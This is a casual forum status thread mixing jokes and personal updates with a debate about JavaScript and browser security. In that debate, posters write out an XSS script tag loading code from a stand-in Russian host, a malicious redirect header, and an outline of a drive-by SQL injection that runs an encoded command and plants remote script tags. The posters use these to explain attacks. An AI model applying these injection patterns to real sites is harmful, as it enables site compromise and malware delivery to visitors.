The Official Status Thread
-
-
That sort of thing would get you SWAT'd these days. And then thrown in jail.
Why? It's just an old Taurus 9mm--on a table, mind--with a piece of paper with two words written on it. Someone didn't believe me when I said I had bought a gun.
-
-
Sounds French.
-
I mean, I knew Boomzilla's the King of all Republicans, but I think he's more the sitting on the estate porch in Georgia sipping $400 sherry type of Republican than the "hey Bill, hold my beer and watch me kick this cow" type of Republican.
I'll be honest. I prefer to kick people. Also better to just chug the beer than to trust Bill.
-
Status: Thrifty Food, Day One
- Breakfast: blueberry muffin & coffee provided by work snack rack
- Lunch: roast beef sandwich and pre-packaged salad
- Dinner: seasoned pork chop, side of baked potato, dessert of heirloom orange
Tomorrow is a work lunch, so I get to "cheat" a bit.
-
dessert of heirloom orange
I don't think I'd want to eat an orange that's old enough to have been passed down through multiple generations.
-
Brothel laws generally don't cover men. Wait are we talking about cars or man-per-square-footage?
-
STATUS:
Reinstalled nvidia drivers for my GTX 970.
I didn't have to reboot afterwards.
I'm in shock! Such a strange thing has never been heard of before!
-
Good, give them to me. They're tasty as shit.
-
Really? Even incompetent NVidia has been managing that for about 3-4 years now. (They SHOULD have had it working about 4 month after Vista came out.)
-
Eh, must've forgotten it after my last install. It was a while ago. It's annoying how few driver developers are actually competent enough to do that though.
-
a thing that can be done with HTML5 and zero javascript
HTML5 is shit and should be destroyed with fire.
a thing that JavaScript cannot do in a sandboxed browser
Unless exploited.
a thing that my browser explicitly gives me a way to stop a site from doing once it attempts to open more than one alert
A thing that my browser explicitly needs permission to start?
-
-
Meanwhile, you're actively fighting something that's actually useful
I let it be useful when it needs to be.
beneficial 99% of the time
Now I know your trollidioting with that stat.
because you're afraid that ohnoez teh javascriptz will infect teh computerz!
Guess what javascript likes to do:
- read cookies (including auth cookies)
- break out of the sandbox
- spy on your form submissions
- POST data to third party servers
- log mouse movement and keystrokes
- click jack
- redirect
- present adware
- run Discourse
Not to mention pull in third party scripts. Like embeds. For Flash. Which is one of the buggiest, back-dooriest, sandbox-breaking piece of shit imaginable.
Javascript is fine. Third party, unknown and untrusted sources aren't is fine.
That is worth actively fighting. Though even that is wrong. I'm not fighting it. I'm passively rejecting it, until it proves itself to me.
but lorne how du u know javascript is teh evils and 
Shhh. Here, the grownups will talk a bit more.
Let's say you go to a website. Let's call it KoalaSpleens.com. It's where you order all your gourmet Koala spleens. You've been there. You've even let it run Javascript.
But oh no, what's this! You happen to glance down at your NoScript and see a red S. There are still some untrusted scripts running there. Well, who is trying to pull in Javascript?
A quick check shows that http://sidfhausd.ru is trying to run uueywuUU.js. Oh fuck, son, KoalaSpleens got hit with a hack, and someone dropped some sweet xss all over the place. Good thing you had that NoScript running. Otherwise some random Russian hacker would be running code on your machine right now.
Oh. Wait. Javascript is useful 99% of the time. I forgot. (that's sarcasm)
-
@Lorne_Kates said:
A thing that my browser explicitly needs permission to start?
Your browser needs to show you an alert to show you an alert?
That's dumb.
-
@Lorne_Kates said:
read cookies (including auth cookies)
Not a problem, if the cookies are configured correctly. If they aren't, you have a bigger problem
@Lorne_Kates said:
break out of the sandbox
Doesn't happen often, gets patched almost immediately.@Lorne_Kates said:
spy on your form submissions
If you visit malicious sites, sure.@Lorne_Kates said:
POST data to third party servers
If you visit malicious sites, sure.@Lorne_Kates said:
click jack
If abused, sure.@Lorne_Kates said:
redirect
HTTP/1.1 302 Found Location: http://www.nastysite.com/viruses.exe@Lorne_Kates said:
present adware
http://guides.uufix.com/wp-content/uploads/2015/12/downloadbut-flashing-side-arrow-animation.gif@Lorne_Kates said:
run Discourse
Well, eh, umm...OK, yeah, that's a fair point.
@Lorne_Kates said:
Not to mention pull in third party scripts. Like embeds. For Flash. Which is one of the buggiest, back-dooriest, sandbox-breaking piece of shit imaginable.
Yeah, but if you're sane, you'll keep those off. Because they are exploited all the freaking time. It's like Adobe doesn't even care. Plus Java and Flash (presumably what you're talking about) are much more powerful and can access much more on the system than JS can. JS is restricted (unless exploits happen) to a very small set of things it can do. Most of which only affect the one tab it's running in, and never persist outside a browser session
@Lorne_Kates said:
Let's say you go to a website. Let's call it KoalaSpleens.com. It's where you order all your gourmet Koala spleens. You've been there. You've even let it run Javascript.
But oh no, what's this! You happen to glance down at your NoScript and see a red S. There are still some untrusted scripts running there. Well, who is trying to pull in Javascript?
A quick check shows that http://sidfhausd.ru is trying to run uueywuUU.js. Oh fuck, son, KoalaSpleens got hit with a hack, and someone dropped some sweet xss all over the place. Good thing you had that NoScript running. Otherwise some random Russian hacker would be running code on your machine right now.
The problem with your example there is that if you can XSS
<script src="http://jfgoiejaija.ru/hack.js" />into the site, you can almost certainly XSS<script> //JS haxxzzz go here </script>into the site. Which means, instead of running third party js, you're running code that comes from the "safe" site.
-
I'm puzzled as to how you think a site that's been compromised would need JavaScript to steal your credit card numbers that you entered into a form on that site.
-
configured correctly
I'll get right on trusting sites to do that.
Doesn't happen often
I'll get right on trusting sites to not let that happen often.
If you visit malicious sites, sure.
XSS
If you visit malicious sites, sure.
XSS
If abused, sure.
XSS
HTTP/1.1 302 Found
Location: http://www.nastysite.com/viruses.exeHTTP headers are server by first part web server.
(And I also have RequestPolicy, which halts redirects to non-whitelisted sites unless I click "OK")
((Download image))
Yes, and I'm careful about software I download, too.
you'll keep those off
I have Java uninstalled. Flash is on click-to-play, so I can start a GooTube video if I want, and fuck the rest. Defense in depth.
can access much more on the system
I know. That's why XSS tend to download a script that loads a Flash object that exploits Adobe's Flash Fuck.
JS is restricted (unless exploits happen)
I'll get right on trust that "unless".
The problem with your example there is that if you can XSS <script src="http://jfgoiejaija.ru/hack.js" /> into the site, you can almost certainly XSS <script> //JS haxxzzz go here </script> into the site. Which means, instead of running third party js, you're running code that comes from the "safe" site.
Except that's not what happens in drive-by bots. Here's the anatomy of a drive-by, assuming it isn't just a simple "we forgot to sanitize our comment form" attack:
- Bot tests all input forms for SQL injection
- If one hits, it injects "declare @a nvarchar(2000); @a=BASE64ENCODED_COMMAND; exec(@a)"
- @a ends up being "For each (n)varchar field in database, update every record to be RECORD + <script src='sdkf.ru/sdfjs.js' />"
- The short script injection maximizes the chances of underflowing the nvarchar field
- The random .js name also helps evade IDS
- It also allows the hacker to modify sdfjs.js on the fly to correct anything post-go live
- The hope is that ONE of those fields will be a public-facing, non-sanitized HTML output
- Unsuspecting user comes around to otherwise safe page, and downloads and runs sdfjs.js, which can contain an unlimited amount of attack code
-
I'm puzzled as to how you think a site that's been compromised would need JavaScript to steal your credit card numbers that you entered into a form on that site.
See above about third party script injection.
Am-- am I the only one here who understands the difference between first and third party, and what an xss is?
-
I'm puzzled as to how a website that doesn't have user-supplied content could have an XSS exploit. Are you clicking on links to koala%20spleen_search--fixed2.php?q=%3Cscript%3Edebugger%3C%2Fscript%3C and then opening your debugger and pasting in the code they said to paste in?
-
I'm puzzled as to how a website that doesn't have user-supplied content could have an XSS exploit
- It could be a crafted link, as you mentioned
- Maybe KoalaSpleens.com has a comments section programmed by Ranger Jimbo's nephew.
- See above re: anatomy of site poisoning
- Ad networks
-
Status: Watching Colbert. Commercial break!
-
funny jokes about how Donald Trump is trying to escape the presidential race by saying increasingly stupid things
- cell phone service provider X is better than cell phone service provider Y
- TV SHOW ABOUT MURDER
- TV SHOW ABOUT MURDER OF DOCTORS
- buy our mattresses
-
if you were hurt or killed in a car accident, get a lawyer
- Here's Donald Rumsfeld. He made an app that is a card game.
Status: why the fuck with the murder horror shows
-
-
@Lorne_Kates said:
I'll get right on trusting sites to do that.
Again... If they're doing cookies that wrong, a XSS js exploit that steals your cookies is the least of your worries.
@Lorne_Kates said:
I'll get right on trusting sites to not let that happen often.
I don't know why you're trusting sites, I'd trust the browser vendors to prevent that and patch it quickly.
Personally.But I guess that's just me.
@Lorne_Kates said:
XSS
Yeah, XSS can do this. But considering I never enter PII into websites ever (no, my email isn't PII), if they steal my form information, oh well. And that's not even remotely likely to happen, because the sites I visit regularly are restricted to, probably like 5 domains.
@Lorne_Kates said:
HTTP headers are server by first part web server.
OK. Still does the same thing as the malicious js...@Lorne_Kates said:
(And I also have RequestPolicy, which halts redirects to non-whitelisted sites unless I click "OK")
That's gotta be annoying.@Lorne_Kates said:
Yes, and I'm careful about software I download, too.
That was an example of adware. I just presented it. I used no Javascipt to present it.@Lorne_Kates said:
I have Java uninstalled. Flash is on click-to-play, so I can start a GooTube video if I want, and fuck the rest. Defense in depth.
As do I@Lorne_Kates said:
I know. That's why XSS tend to download a script that loads a Flash object that exploits Adobe's Flash Fuck.
Or....... just use HTML to load a Flash object that exploits Adobe's Flash Fuck? No need to use js there...
@Lorne_Kates said:
I'll get right on trust that "unless".
A quick google search found no instances of js sandbox escape vulnerabilities.
Found one. From 2009. Top result. https://blog.mozilla.org/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/I do seem to recall hearing about another one, a while back, but I can't remember it.
Regardless, they are extremely rare and are generally patched immediately (because browser vendors patch things like that very quickly).@Lorne_Kates said:
Except that's not what happens in drive-by bots. Here's the anatomy of a drive-by, assuming it isn't just a simple "we forgot to sanitize our comment form" attack:
How is that relevant to the discussion? A SQL-injection vuln on the server-side doesn't really have any impact on Javascript's security on the client........
-
give them to me.
I find they're generally dried out and/or moldy. I don't want them, so you're welcome to them.
@blakeyrat said:They're tasty as shit.
Um, ok, if you really like that sort of thing, I guess. I won't judge (out loud, anyway), but I'm definitely not into that.
-
HTML/CSS teacher just explained that moving the mouse around on the computer slows down the FTP upload (of a... like, 10 meg site) because the computer has to process more things and will get slowed down
It would, technically, be slowed down. Whether or not it is slowed down by any perceptible length of time, however, is another matter.
-
Well actually I don't think it even would be in a multicore environment.
But yeah, technicality granted.
Not good enough for a
though :)
-
Please, tell me more about your newfangled "computer that needs to do network IO to move the cursor".
-
two things:
- FTP isn't going to max out your CPU. In fact, it'll barely be using your CPU at all apart from reading files and shoving them across the network.
- If your computer needs more than the remaining 99.9% of its CPU time to render the mouse cursor moving across the screen, you may want to consider getting a new operating system.
- Your computer would be slowed down a lot more by going into sleep mode and shutting down its network drivers in order to save power. 0 bits per second is pretty slow.
- I lied about the number of things.
-
It would, technically, be slowed down.
If the process were CPU-bound, perhaps. In this case, however, the network bandwidth is going to be the limiting factor. Also, even if the process were indeed CPU-bound, unless the process is fully utilizing all the cores, the mouse interrupts could be serviced by another core without disturbing the upload process.
-
Please, tell me more about your newfangled "computer that needs to do network IO to move the cursor".
How about I tell you more about my old "computer that uses at least some processing time to do every single action"
But, yeah, I do believe that multicore would result in essentially zero effect on the FTP upload from moving the mouse. BUT NOT EVERYONE HAS MORE THAN ONE CORE!
Okay, if you have a website and you're having it hosted somewhere, you're
probablyhopefully not developing on a single core device.
-
"computer that needs to do network IO to move the cursor".
Every single one of my VMs, because I connect to them over VNC.
Oh yeah,
-
If the process were CPU-bound, perhaps. In this case, however, the network bandwidth is going to be the limiting factor.
Also a good point.
-
Would anyone like a Free Unix Computing Kit?
Nevermind, I don't have any to give.
-
-
Computer Refurbishment And Protection
-
How about I tell you more about my old "computer that uses at least some processing time to do every single action"
Unless you're maxing out the core your process is running on, your computer isn't going to be slowed down by other processes sharing it. Or do you think that adding two cars to a three-lane road with one car on it causes congestion?
-
@sloosecannon said:
computer has to process more things and will get slowed down
To be fair, that might have been true in the past, like 1985 or something.
I recall hearing about windows XP that shaking the mouse in an application actually made it run faster, since its priority got elevated because of user interaction... Never had a reason to try it though, though, since I was using an UltraSPARC 5 and an Indigo2 at the time.
-
I'm well aware what he said was a wtf. That's why I posted it here :)
-
Or do you think that adding two cars to a three-lane road with one car on it causes congestion?
It seems like it should present no problem, but that exact situation can and often will result in slower movement, at least with the genius drivers around here.
-
Please, tell me more about this computer that is already redrawing the screen at 60+ times a second while polling for changes to things (yay int 33h) and would be doing the work either way.
-
@Lorne_Kates said:
KoalaSpleens.com
I'm a little disappointed that isn't a real site =(STATUS Finishing early today! Doctor wants to talk to me about my arse. =(
-
-
Doctor wants to talk to me about my arse
Your own damn fault for continuing to force objects in through the exit
-
@DogsB said:
MY POCKETS ARE FULL! WHERE WILL I STORE MY PHONE?Doctor wants to talk to me about my arse
Your own damn fault for continuing to force objects in through the exit
-
Doctor wants to talk to me about my arse.
"So, Mr. DogsB... that arse of yours..."
"Yes, Doctor?"
"Just wanted to say... daaamn. Those buns, man. You're making your momma proud."
"Uh, okay... *backs away slowly*"
Filed under: "also, you have ass cancer."
-
STATUS Bewildered!
Someone in the office is wearing the same shirt as I am. Thank god I'm leaving early so that I can go home and change.
-
Someone in the office is wearing the same shirt as I am. Thank god I'm leaving early so that I can go home and change.
What's so bad about that?
-
Someone in the office is wearing the same shirt as I am.
Must be a big shirt if two of you can fit in it ;)
-
Someone in the office is wearing the same shirt as I am. Thank god I'm leaving early so that I can go home and change.
You seem to care too much about what people in the office think about what you wear.
